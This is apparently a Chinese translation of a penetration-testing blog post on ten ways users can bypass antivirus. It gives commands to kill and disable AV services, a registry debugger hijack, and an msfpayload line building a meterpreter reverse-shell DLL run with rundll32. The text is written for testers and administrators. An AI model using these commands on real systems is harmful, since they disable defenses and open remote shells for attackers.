原文：https://blog.netspi.com/10-evil-user-tricks-for-bypassing-anti-virus/

介紹

譯者注：很多不通順的語句改掉了，還有反病毒解決方案統(tǒng)一翻譯為了反病毒軟件。無關(guān)緊要的話直接意思翻譯

許多反病毒軟件的部署配置方法較弱，為最終用戶提供了根據(jù)需求快速禁用或解決產(chǎn)品問題方法。因此，即使沒有超級(jí)黑客“技能”的用戶也可以運(yùn)行惡意可執(zhí)行文件（有意或無意），而無需以任何方式實(shí)際修改它們以避免檢測。這種技術(shù)很適合于滲透測試。本博客將簡要概述10個(gè)需要注意的問題。對(duì)于在當(dāng)前實(shí)現(xiàn)中尋找基本弱點(diǎn)的管理員來說應(yīng)該是有趣的。對(duì)于經(jīng)驗(yàn)豐富的老人來說，這篇文章很可能不那么有趣。

免責(zé)聲明：文章中的方法不是完整的方法，事實(shí)上也沒有完美的繞過方法。我已經(jīng)列出了本文的提綱，給那些不想上來就閱讀的讀者。

1、添加反病毒軟件信任名單策略 2、通過GUI禁用反病毒軟件 3、終止反病毒軟件進(jìn)程 4、停止并禁用反病毒服務(wù) 5、調(diào)試設(shè)置禁用反病毒軟件 6、卸載反病毒軟件 7、從UNC路徑或可移動(dòng)媒體執(zhí)行 8、從備用數(shù)據(jù)流執(zhí)行 9、DLL執(zhí)行 10、外部文件系統(tǒng)執(zhí)行

添加防病毒軟件信任名單策略

一個(gè)有趣的選項(xiàng)是反病毒軟件的策略偶爾用到的例外選項(xiàng)(可以理解是信任名單)。例如用戶可以創(chuàng)建一個(gè)異常，允許所有具有“.exe”擴(kuò)展名的文件在系統(tǒng)上運(yùn)行。因此，大多數(shù)惡意軟件和“黑客工具”都不會(huì)被阻止或刪除。有關(guān)如何在Symantec End Point Protection產(chǎn)品中完成此操作的示例，請(qǐng)參閱以下Symantec幫助頁面： http://www.symantec.com/business/support/index?page=content&id=TECH104326

通過GUI禁用反病毒

這在近幾年不太常見，但歷史上非管理用戶有權(quán)通過GUI界面禁用許多反病毒軟件。過去就像右鍵單擊任務(wù)欄圖標(biāo)并選擇禁用一樣簡單。可以想象，執(zhí)行繞過反病毒所需的技能水平很低，但組織面臨的風(fēng)險(xiǎn)很高。

終止反病毒軟件進(jìn)程

一些反病毒軟件由多個(gè)服務(wù)組成，這些服務(wù)喜歡不斷重啟。 那在禁用服務(wù)之前終止進(jìn)程可以派上用場。 通常可以使用taskkill命令。 這是基于Metasploit發(fā)布模塊“killav”的作用。 仔細(xì)查看該模塊可以在這里找到：https://github.com/rapid7/metasploit-framework/blob/master/scripts/meterpreter/killav.rb

您可以發(fā)出以下命令，使用taskkill手動(dòng)強(qiáng)制終止任務(wù)：

Taskkill /F /IM avprocess.exe

停止并禁用反病毒服務(wù)

在某些情況下，用戶沒有通過GUI禁用反病毒的權(quán)限，但他們確實(shí)可以控制相關(guān)服務(wù)。 如果是這種情況，則通常可以停止和禁用防病毒服務(wù)。 這可以通過services.msc，“sc”命令或“net stop”命令來完成。 但是在退出系統(tǒng)之前，請(qǐng)始終確保成為一個(gè)好的測試者并將服務(wù)恢復(fù)到其原始狀態(tài)。

要停止Windows服務(wù)，請(qǐng)發(fā)出以下命令：

net stop “service name”

要禁用Windows服務(wù)，請(qǐng)發(fā)出以下命令：

sc config "service name" start= disabled

services.msc控制臺(tái)還可用于通過GUI界面停止和禁用服務(wù)。 可以通過導(dǎo)航到【開始菜單】-> 【運(yùn)行】并鍵入“services.msc”來訪問它。

通過調(diào)試設(shè)置禁用反病毒軟件

這是Khai Tran告訴我的一個(gè)非常酷的技巧。他引用的原始文章可以在http://blogs.msdn.com/b/greggm/archive/2005/02/21/377663.aspx找到。我建議看看這篇文章。簡而言之，用戶可以通過在注冊(cè)表中設(shè)置自定義調(diào)試器來防止運(yùn)行反病毒程序。當(dāng)操作系統(tǒng)或用戶嘗試執(zhí)行反病毒軟件時(shí)，將執(zhí)行指定的調(diào)試程序。這個(gè)方法太聰明了，惡意軟件開發(fā)人員多年來一直使用它。下面提供了進(jìn)行攻擊的基本步驟。請(qǐng)注意，這些是從上面的鏈接中獲取的。

運(yùn)行regedit.exe 轉(zhuǎn)到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image文件執(zhí)行選項(xiàng) 創(chuàng)建一個(gè)新密鑰（例如：calc.exe） 在exe下創(chuàng)建一個(gè)新的字符串值。字符串值的名稱是'Debugger'，值是svchost.exe（或任何東西）

卸載反病毒軟件

雖然我不建議在滲透測試期間卸載反病毒軟件，但這個(gè)方法仍然可以被視為有效的旁路方法。在卸載過程開始之前，某些反病毒卸載可能需要密碼。在這些情況下，通?？梢栽谧?cè)表或系統(tǒng)上的ini文件中找到密碼。但是可以使用其他旁路方法，如下面文章鏈接中所述。文章中建議在提示輸入卸載密碼時(shí)簡單地終止“msiexec.exe”進(jìn)程。http://helpdeskgeek.com/help-desk/uninstall-symantec-endpoint-protection-without-a-password/

從UNC路徑或可移動(dòng)媒體執(zhí)行（U盤）

某些反病毒軟件未配置為在通過UNC路徑訪問時(shí)掃描或阻止從SMB或WebDAV執(zhí)行惡意二進(jìn)制文件。這很奇怪，但確實(shí)如此。因此攻擊者可以簡單地映射包含后門，黑客工具等惡意的共享，并執(zhí)行惡意軟件。我猜有些人的印象是惡意軟件無法存儲(chǔ)在網(wǎng)絡(luò)驅(qū)動(dòng)器上。同樣，某些反病毒軟件未配置為掃描或阻止從可移動(dòng)介質(zhì)（如SD卡，iPod或USB驅(qū)動(dòng)器）執(zhí)行二進(jìn)制文件。在社會(huì)工程學(xué)活動(dòng)中現(xiàn)場丟棄惡意的USB驅(qū)動(dòng)器是很常見的手法，所以這個(gè)讓我有點(diǎn)害怕。

從備用數(shù)據(jù)流執(zhí)行

備用數(shù)據(jù)流允許用戶通過擴(kuò)展文件名將數(shù)據(jù)存儲(chǔ)在文件中。微軟表示，“默認(rèn)情況下，所有數(shù)據(jù)都存儲(chǔ)在文件的主要未命名數(shù)據(jù)流中，但通過使用語法 ‘file:stream’可以讀取和寫入替換數(shù)據(jù)。惡意軟件通常在備用流中存儲(chǔ)文本，有效載荷(Payload)甚至完整二進(jìn)制文件。歷史上，反病毒軟件錯(cuò)過了許多使用替代數(shù)據(jù)流的惡意軟件。然而，多年來，AV在尋找它們方面變得更好。您可以使用流掃描系統(tǒng)中包含備用數(shù)據(jù)流的文件（http://technet.microsoft.com/en-us/sysinternals/bb897440.aspx）來自Sysinternals工具包的工具。此外，您可以使用下面的基本示例自行嘗試該技術(shù)。將文本“Hello world”回顯到新文件的主數(shù)據(jù)流中：

echo Hello world > file

將文本“Hello Evil”回顯為備用數(shù)據(jù)流：

echo Hello evil > file:evil

從文件的主數(shù)據(jù)流中讀取：

type file

從文件的替代數(shù)據(jù)流中讀取：

type file:evil

從DLL執(zhí)行

在某些情況下，我發(fā)現(xiàn)如果反病毒軟件被放入DLL而不是EXE文件中，反病毒軟件就會(huì)錯(cuò)過惡意代碼。我提供了一個(gè)如何使用Metasploit框架生成和運(yùn)行DLL的基本示例。使用msfpayload命令創(chuàng)建包含meterpreter有效Payload的evil.DLL：

msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=443 D > evil.dll

使用Rundll32命令運(yùn)行DLL main函數(shù)：

Rundll32 evil.dll, @DllMain12

從文件系統(tǒng)外部執(zhí)行

顯然，一些惡意軟件存儲(chǔ)并執(zhí)行磁盤上文件系統(tǒng)外部的代碼。聽起來您可以通過某種方式引用物理驅(qū)動(dòng)器來訪問代碼。我沒有時(shí)間真正探索這個(gè)，但在“ 實(shí)用惡意軟件分析：解析惡意軟件的動(dòng)手指南 ”一書中有所涉及。當(dāng)我了解到更多細(xì)節(jié)的時(shí)候，我會(huì)再次分享。如果有人有詳細(xì)信息，也請(qǐng)告訴我。

總結(jié)

希望您有一些有趣的實(shí)驗(yàn)然后更好地了解大多數(shù)反病毒軟件真正提供的保護(hù)級(jí)別。我正在研究其他一些專注于通過源代碼，二進(jìn)制和流程操作來繞過反病毒軟件的技術(shù)博客，這些技術(shù)博客也應(yīng)該增加對(duì)常見旁路方法的一些了解。在此期間，享受其中的樂趣并且肩負(fù)起黑客的責(zé)任。

轉(zhuǎn)載于:https://www.cnblogs.com/17bdw/p/10575815.html

總結(jié)

以上是生活随笔為你收集整理的10个绕过反病毒的恶意用户技巧的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。